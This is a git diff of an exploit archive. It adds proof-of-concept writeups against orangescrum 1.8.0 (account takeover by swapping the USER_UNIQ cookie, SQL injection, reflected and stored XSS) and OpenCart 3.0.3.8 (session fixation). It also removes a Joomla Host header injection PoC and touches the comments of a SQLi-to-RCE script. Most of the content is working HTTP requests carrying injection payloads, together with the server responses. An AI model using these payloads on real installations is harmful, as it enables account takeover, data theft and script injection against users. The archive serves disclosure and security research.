diff --git a/exploits/multiple/webapps/50551.txt b/exploits/multiple/webapps/50551.txt
new file mode 100644
index 000000000..fbe83306d
--- /dev/null
+++ b/exploits/multiple/webapps/50551.txt
@@ -0,0 +1,30 @@
+# Exploit Title: orangescrum 1.8.0 - Privilege escalation (Authenticated)
+# Date: 07/10/2021
+# Exploit Author: Hubert Wojciechowski
+# Contact Author: snup.php@gmail.com
+# Company: https://redteam.pl
+# Vendor Homepage: https://www.orangescrum.org/
+# Software Link: https://www.orangescrum.org/
+# Version: 1.8.0
+# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+
+### Privilege escalation
+
+
+# The user must be assigned to the project with the account he wants to take over
+# The vulnerabilities in the application allow for:
+
+* Taking over any account with which the project is assigned
+
+-----------------------------------------------------------------------------------------------------------------------
+# POC
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example
+
+1. Go to the dashboard
+2. Go to the page source view
+3. Find in source "var PUSERS"
+4. Copy "uniq_id" victim
+5. Change cookie "USER_UNIQ" to "USER_UNIQ" victim from page source
+6. After refreshing the page, you are logged in to the victim's account
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50553.txt b/exploits/multiple/webapps/50553.txt
new file mode 100644
index 000000000..a8a56398e
--- /dev/null
+++ b/exploits/multiple/webapps/50553.txt
@@ -0,0 +1,133 @@
+# Exploit Title: orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)
+# Date: 28/11/2021
+# Exploit Author: Hubert Wojciechowski
+# Contact Author: snup.php@gmail.com
+# Company: https://redteam.pl
+# Vendor Homepage: https://www.orangescrum.org/
+# Software Link: https://www.orangescrum.org/
+# Version: 1.8.0
+# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+
+### SQL Injection
+
+
+# Authenticated user
+
+-----------------------------------------------------------------------------------------------------------------------
+# POC
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example vuln parameters:
+
+* project_id
+* old_project_id
+* uuid
+* uniqid
+* projid
+* id
+* caseno
+
+-----------------------------------------------------------------------------------------------------------------------
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example
+
+-----------------------------------------------------------------------------------------------------------------------
+Req old_project_id=1' - error
+-----------------------------------------------------------------------------------------------------------------------
+
+POST /orangescrum/easycases/move_task_to_project HTTP/1.1
+Origin: http://127.0.0.1
+Content-Length: 64
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Sec-Fetch-Site: same-origin
+Host: 127.0.0.1:80
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Connection: close
+X-Requested-With: XMLHttpRequest
+Sec-Fetch-Mode: cors
+Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2
+Referer: http://127.0.0.1/orangescrum/dashboard
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Sec-Fetch-Dest: empty
+
+project_id=3&old_project_id=2'&case_id=2&case_no=1&is_multiple=0
+
+-----------------------------------------------------------------------------------------------------------------------
+Res:
+-----------------------------------------------------------------------------------------------------------------------
+
+HTTP/1.1 500 Internal Server Error
+Date: Sun, 28 Nov 2021 12:42:30 GMT
+Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
+X-Powered-By: PHP/5.6.40
+Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Content-Length: 132182
+Vary: User-Agent
+Expires: access 12 month
+Connection: close
+[...]
+
+-----------------------------------------------------------------------------------------------------------------------
+Req old_project_id=1'' - not error
+-----------------------------------------------------------------------------------------------------------------------
+
+POST /orangescrum/easycases/move_task_to_project HTTP/1.1
+Origin: http://127.0.0.1
+Content-Length: 66
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Sec-Fetch-Site: same-origin
+Host: 127.0.0.1:80
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Connection: close
+X-Requested-With: XMLHttpRequest
+Sec-Fetch-Mode: cors
+Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2
+Referer: http://127.0.0.1/orangescrum/dashboard
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Sec-Fetch-Dest: empty
+
+project_id=3&old_project_id=2'';&case_id=2&case_no=1&is_multiple=0
+
+-----------------------------------------------------------------------------------------------------------------------
+Res
+-----------------------------------------------------------------------------------------------------------------------
+
+HTTP/1.1 200 OK
+Date: Sun, 28 Nov 2021 12:51:23 GMT
+Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
+X-Powered-By: PHP/5.6.40
+Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Vary: User-Agent
+Expires: access 12 month
+Content-Length: 1
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+0
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50554.txt b/exploits/multiple/webapps/50554.txt
new file mode 100644
index 000000000..4a045187c
--- /dev/null
+++ b/exploits/multiple/webapps/50554.txt
@@ -0,0 +1,133 @@
+# Exploit Title: orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)
+# Date: 28/11/2021
+# Exploit Author: Hubert Wojciechowski
+# Contact Author: snup.php@gmail.com
+# Company: https://redteam.pl
+# Vendor Homepage: https://www.orangescrum.org/
+# Software Link: https://www.orangescrum.org/
+# Version: 1.8.0
+# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+
+### XSS Reflected
+
+
+# Authenticated user
+
+-----------------------------------------------------------------------------------------------------------------------
+# POC
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example XSS Reflected
+
+Param: projid
+-----------------------------------------------------------------------------------------------------------------------
+Req
+-----------------------------------------------------------------------------------------------------------------------
+
+POST /orangescrum/easycases/edit_reply HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 64
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/orangescrum/dashboard
+Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; CURRENT_FILTER=cases
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+id=5&reply_flag=1&projid=1zxcvczxzxcv"><script>alert(1)</script>
+
+-----------------------------------------------------------------------------------------------------------------------
+Res:
+-----------------------------------------------------------------------------------------------------------------------
+
+HTTP/1.1 200 OK
+Date: Sun, 28 Nov 2021 13:28:57 GMT
+Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
+X-Powered-By: PHP/5.6.40
+Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
+Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
+Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
+Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
+Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
+Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
+Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
+Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
+Content-Length: 1114
+Vary: User-Agent
+Expires: access 12 month
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<table cellpadding="0" cellspacing="0" class="edit_rep_768 col-lg-12">
+	<tr>
+		<td>
+			<textarea name="edit_reply_txtbox5" id="edit_reply_txtbox5" rows="3" class="reply_txt_ipad col-lg-12">
+				                    xczcxz"/><b>bb</b>bbxczcxz"/>&ltxczcxz"/><b>bb</b>bb;b>bb</b>bbxczcxz"/><b>bb</b>bb			</textarea>
+		</td>
+	</tr>
+	<tr>
+		<td align="right">
+			<div id="edit_btn5" class="fr">
+				<button type="button" value="Save" style="margin:5px;padding:3px 32px 3px 32px;" class="btn btn_blue" onclick="save_editedvalue_reply(2,5,1zxcvczxzxcv"><script>alert(1)</script>,'c64271510399996f611739b
+[...]
+
+
+## Example XSS Stored
+
+Example vuln paraMETERS:
+* CS_message
+* name
+* data[User][email]
+
+-----------------------------------------------------------------------------------------------------------------------
+Param: CS_message
+-----------------------------------------------------------------------------------------------------------------------
+Req
+-----------------------------------------------------------------------------------------------------------------------
+
+POST /orangescrum/easycases/ajaxpostcase HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 393
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/orangescrum/dashboard/?project=3966c2c5cc3745d161640d07450d682c
+Cookie: language=en-gb; currency=USD; CAKEPHP=j27a7es1lv1ln77gpngicqshe4; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; CURRENT_FILTER=cases; TASK_TYPE_IN_DASHBOARD=1; LAST_CREATED_PROJ=14
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+pid=14&CS_project_id=8f4adc0f496a3738f04d629be909488d&CS_istype=2&CS_title=&CS_type_id=15&CS_priority=1&CS_message=zxcvbzz"/><img%20src=x%20onmouseover=alert(1)>axcbv&CS_assign_to=1&CS_due_date=&CS_milestone=&postdata=Post&pagename=dashboard&emailUser%5B%5D=1&CS_id=2678&CS_case_no=1&datatype=1&CS_legend=2&prelegend=1&hours=0&estimated_hours=0&completed=0&taskid=0&task_uid=0&editRemovedFile=
+
+-----------------------------------------------------------------------------------------------------------------------
+Res:
+-----------------------------------------------------------------------------------------------------------------------
+
+HTTP/1.1 200 OK
+Date: Sun, 28 Nov 2021 13:51:29 GMT
+Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
+X-Powered-By: PHP/5.6.40
+Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
+Vary: User-Agent
+Expires: access 12 month
+Content-Length: 698
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+{"success":"success","pagename":"dashboard","formdata":"8f4adc0f496a3738f04d629be909488d","postParam":"Post","caseUniqId":"eb8671bf1e20702b7793b11152e9ff32","format":2,"allfiles":null,"caseNo":"1","emailTitle":"aaaaaaaaaaaaaaz\"\/><img src=x onmouseover=alert(1)>a","emailMsg":"zxcvbzz\"\/><img src=x onmouseover=alert(1)>
+[...]
\ No newline at end of file
diff --git a/exploits/php/webapps/47632.txt b/exploits/php/webapps/47632.txt
deleted file mode 100644
index e8035ff69..000000000
--- a/exploits/php/webapps/47632.txt
+++ /dev/null
@@ -1,237 +0,0 @@
-# Exploit Title: Joomla 3.9.13 - 'Host' Header Injection
-# Author: Pablo Santiago
-# Date: 2019-11-12
-# Vendor Homepage: https://www.joomla.org/
-# Source: https://downloads.joomla.org/cms/joomla3/3-9-13/Joomla_3-9-13-Stable-Full_Package.zip?format=zip
-# Version: 3.9.13
-# CVE : N/A
-# Tested on: Windows 10
-
-#PoC
-
-curl http://localhost/joomla/ -H "Host: exploit-db.com"
-
-<!DOCTYPE html>
-<html lang="en-gb" dir="ltr">
-<head>
-        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
-        <meta charset="utf-8" />
-        <base href="http://exploit-db.com/joomla/" />
-        <meta name="description" content="javacript:alert(document.cookie)" />
-        <meta name="generator" content="Joomla! - Open Source Content
-Management" />
-        <title>Home</title>
-        <link href="/joomla/index.php?format=feed&type=rss"
-rel="alternate" type="application/rss+xml" title="RSS 2.0" />
-        <link href="/joomla/index.php?format=feed&type=atom"
-rel="alternate" type="application/atom+xml" title="Atom 1.0" />
-        <link href="/joomla/templates/protostar/favicon.ico"
-rel="shortcut icon" type="image/vnd.microsoft.icon" />
-        <link href="/joomla/templates/protostar/css/template.css?190197408a83fd286a9c42640a0f2f22"
-rel="stylesheet" />
-        <link href="https://fonts.googleapis.com/css?family=Open+Sans"
-rel="stylesheet" />
-        <style>
-
-        h1, h2, h3, h4, h5, h6, .site-title {
-                font-family: 'Open Sans', sans-serif;
-        }
-        </style>
-        <script type="application/json" class="joomla-script-options
-new">{"csrf.token":"d460ac322fbbb6ae67cc78034182d9e1","system.paths":{"root":"\/joomla","base":"\/joomla"},"system.keepalive":{"interval":840000,"uri":"\/joomla\/index.php\/component\/ajax\/?format=json"}}</script>
-        <script
-src="/joomla/media/jui/js/jquery.min.js?190197408a83fd286a9c42640a0f2f22"></script>
-        <script
-src="/joomla/media/jui/js/jquery-noconflict.js?190197408a83fd286a9c42640a0f2f22"></script>
-        <script
-src="/joomla/media/jui/js/jquery-migrate.min.js?190197408a83fd286a9c42640a0f2f22"></script>
-        <script
-src="/joomla/media/system/js/caption.js?190197408a83fd286a9c42640a0f2f22"></script>
-        <script
-src="/joomla/media/jui/js/bootstrap.min.js?190197408a83fd286a9c42640a0f2f22"></script>
-        <script
-src="/joomla/templates/protostar/js/template.js?190197408a83fd286a9c42640a0f2f22"></script>
-        <!--[if lt IE 9]><script
-src="/joomla/media/jui/js/html5.js?190197408a83fd286a9c42640a0f2f22"></script><![endif]-->
-        <script
-src="/joomla/media/system/js/core.js?190197408a83fd286a9c42640a0f2f22"></script>
-        <!--[if lt IE 9]><script
-src="/joomla/media/system/js/polyfill.event.js?190197408a83fd286a9c42640a0f2f22"></script><![endif]-->
-        <script
-src="/joomla/media/system/js/keepalive.js?190197408a83fd286a9c42640a0f2f22"></script>
-        <script>
-jQuery(window).on('load',  function() {
-                                new JCaption('img.caption');
-jQuery(function($){ initTooltips(); $("body").on("subform-row-add",
-initTooltips); function initTooltips (event, container) { container =
-container || document;$(container).find(".hasTooltip").tooltip({"html":
-true,"container": "body"});} });
-        </script>
-
-</head>
-<body class="site com_content view-featured no-layout no-task itemid-101">
-        <!-- Body -->
-        <div class="body" id="top">
-                <div class="container">
-                        <!-- Header -->
-                        <header class="header" role="banner">
-                                <div class="header-inner clearfix">
-                                        <a class="brand pull-left"
-href="/joomla/">
-                                                <span
-class="site-title"
-title="javacript:alert(document.cookie)">javacript:alert(document.cookie)</span>
-
-          </a>
-                                        <div class="header-search pull-right">
-
-                                        </div>
-                                </div>
-                        </header>
-
-                        <div class="row-fluid">
-                                                                <main
-id="content" role="main" class="span9">
-                                        <!-- Begin Content -->
-
-                                        <div id="system-message-container">
-        </div>
-
-                                        <div class="blog-featured"
-itemscope itemtype="https://schema.org/Blog">
-<div class="page-header">
-        <h1>
-        Home    </h1>
-</div>
-
-
-
-</div>
-
-                                        <div class="clearfix"></div>
-                                        <div aria-label="breadcrumbs"
-role="navigation">
-        <ul itemscope itemtype="https://schema.org/BreadcrumbList"
-class="breadcrumb">
-                                        <li>
-                                You are here: &#160;
-                        </li>
-
-                                                <li
-itemprop="itemListElement" itemscope
-itemtype="https://schema.org/ListItem" class="active">
-                                        <span itemprop="name">
-                                                Home
-                 </span>
-                                        <meta itemprop="position" content="1">
-                                </li>
-                                </ul>
-</div>
-
-                                        <!-- End Content -->
-                                </main>
-
- <div id="aside" class="span3">
-                                                <!-- Begin Right Sidebar -->
-                                                <div class="well
-_menu"><h3 class="page-header">Main Menu</h3><ul class="nav menu
-mod-list">
-<li class="item-101 default current active"><a
-href="/joomla/index.php" >Home</a></li></ul>
-</div><div class="well "><h3 class="page-header">Login Form</h3><form
-action="/joomla/index.php" method="post" id="login-form"
-class="form-inline">
-                <div class="userdata">
-                <div id="form-login-username" class="control-group">
-                        <div class="controls">
-
- <div class="input-prepend">
-                                                <span class="add-on">
-                                                        <span
-class="icon-user hasTooltip" title="Username"></span>
-                                                        <label
-for="modlgn-username" class="element-invisible">Username</label>
-                                                </span>
-                                                <input
-id="modlgn-username" type="text" name="username" class="input-small"
-tabindex="0" size="18" placeholder="Username" />
-                                        </div>
-                                                        </div>
-                </div>
-                <div id="form-login-password" class="control-group">
-                        <div class="controls">
-
- <div class="input-prepend">
-                                                <span class="add-on">
-                                                        <span
-class="icon-lock hasTooltip" title="Password">
-                                                        </span>
-                                                                <label
-for="modlgn-passwd" class="element-invisible">Password
-                             </label>
-                                                </span>
-                                                <input
-id="modlgn-passwd" type="password" name="password" class="input-small"
-tabindex="0" size="18" placeholder="Password" />
-                                        </div>
-                                                        </div>
-                </div>
-                                                <div
-id="form-login-remember" class="control-group checkbox">
-                        <label for="modlgn-remember"
-class="control-label">Remember Me</label> <input id="modlgn-remember"
-type="checkbox" name="remember" class="inputbox" value="yes"/>
-                </div>
-                                <div id="form-login-submit"
-class="control-group">
-                        <div class="controls">
-                                <button type="submit" tabindex="0"
-name="Submit" class="btn btn-primary login-button">Log in</button>
-                        </div>
-                </div>
-                                        <ul class="unstyled">
-                                                        <li>
-                                        <a
-href="/joomla/index.php/component/users/?view=remind&Itemid=101">
-                                        Forgot your username?</a>
-                                </li>
-                                <li>
-                                        <a
-href="/joomla/index.php/component/users/?view=reset&Itemid=101">
-                                        Forgot your password?</a>
-                                </li>
-                        </ul>
-                <input type="hidden" name="option" value="com_users" />
-                <input type="hidden" name="task" value="user.login" />
-                <input type="hidden" name="return"
-value="aHR0cDovL2V4cGxvaXQtZGIuY29tL2pvb21sYS8=" />
-                <input type="hidden"
-name="d460ac322fbbb6ae67cc78034182d9e1" value="1" />       </div>
-        </form>
-</div>
-                                                <!-- End Right Sidebar -->
-                                        </div>
-                                                        </div>
-                </div>
-        </div>
-        <!-- Footer -->
-        <footer class="footer" role="contentinfo">
-                <div class="container">
-                        <hr />
-
-                        <p class="pull-right">
-                                <a href="#top" id="back-top">
-                                        Back to Top
-         </a>
-                        </p>
-                        <p>
-                                &copy; 2019
-javacript:alert(document.cookie)                    </p>
-                </div>
-        </footer>
-
-</body>
-</html>
-
-#PoC Visual
-https://imgur.com/a/IgO4ZxI
\ No newline at end of file
diff --git a/exploits/php/webapps/50439.py b/exploits/php/webapps/50439.py
index abc88f87f..d40184e35 100755
--- a/exploits/php/webapps/50439.py
+++ b/exploits/php/webapps/50439.py
@@ -8,8 +8,8 @@
 # References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e
 
 # Vulnerability: Through SQL injection to bypass the login form it is
-possible to upload a malicious file and after use that malicious file to
-execute code in the remote system.
+# possible to upload a malicious file and after use that malicious file to
+# execute code in the remote system.
 # Proof of Concept:
 
 import requests
diff --git a/exploits/php/webapps/50555.txt b/exploits/php/webapps/50555.txt
new file mode 100644
index 000000000..9e1bb6277
--- /dev/null
+++ b/exploits/php/webapps/50555.txt
@@ -0,0 +1,57 @@
+# Exploit Title: opencart 3.0.3.8 - Sessjion Injection
+# Date: 28/11/2021
+# Exploit Author: Hubert Wojciechowski
+# Contact Author: snup.php@gmail.com
+# Company: https://redteam.pl
+# Vendor Homepage: https://www.opencart.com/
+# Software Link: https://www.opencart.com/
+# Version: 3.0.3.8
+# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+
+### Sessjion Fixation / injection
+
+Session cookie "OCSESSID" is inproperly processed
+Attacker can set any value cookie and server set this value
+Becouse of that sesssion injection and session fixation vulnerability
+
+-----------------------------------------------------------------------------------------------------------------------
+# POC
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example
+
+Modify cookie "OCSESSID" value:
+-----------------------------------------------------------------------------------------------------------------------
+Req
+-----------------------------------------------------------------------------------------------------------------------
+
+GET /opencart-3.0.3.8/index.php?route=product/category&path=20_26 HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://127.0.0.1/opencart-3.0.3.8/
+Cookie: language=en-gb; currency=USD; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USERSUB_TYPE=0; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=mydashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; TASK_TYPE_IN_DASHBOARD=10; CURRENT_FILTER=cases; DASHBOARD_ORDER=1_1%3A%3A1%2C2%2C3%2C5%2C6%2C8%2C9; CAKEPHP=ommpvclncs2t37j8tsep486ig5; OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+-----------------------------------------------------------------------------------------------------------------------
+Server set atttacker value:
+
+Res:
+-----------------------------------------------------------------------------------------------------------------------
+
+HTTP/1.1 200 OK
+Date: Sun, 28 Nov 2021 15:16:06 GMT
+Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
+X-Powered-By: PHP/8.0.11
+Set-Cookie: OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv; path=/
+Connection: close
+Content-Type: text/html; charset=utf-8
+Content-Length: 18944
+[...]
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 50fffc9bc..95bc3143d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42964,7 +42964,6 @@ id,file,description,date,author,type,platform,port
 47628,exploits/hardware/webapps/47628.txt,"CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin)",1970-01-01,LiquidWorm,webapps,hardware,
 47630,exploits/hardware/webapps/47630.txt,"CBAS-Web 19.0.0 - Username Enumeration",1970-01-01,LiquidWorm,webapps,hardware,
 47631,exploits/php/webapps/47631.txt,"CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection",1970-01-01,LiquidWorm,webapps,php,
-47632,exploits/php/webapps/47632.txt,"Joomla! 3.9.13 - 'Host' Header Injection",1970-01-01,"Pablo Santiago",webapps,php,
 47633,exploits/alpha/webapps/47633.txt,"Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting",1970-01-01,LiquidWorm,webapps,alpha,
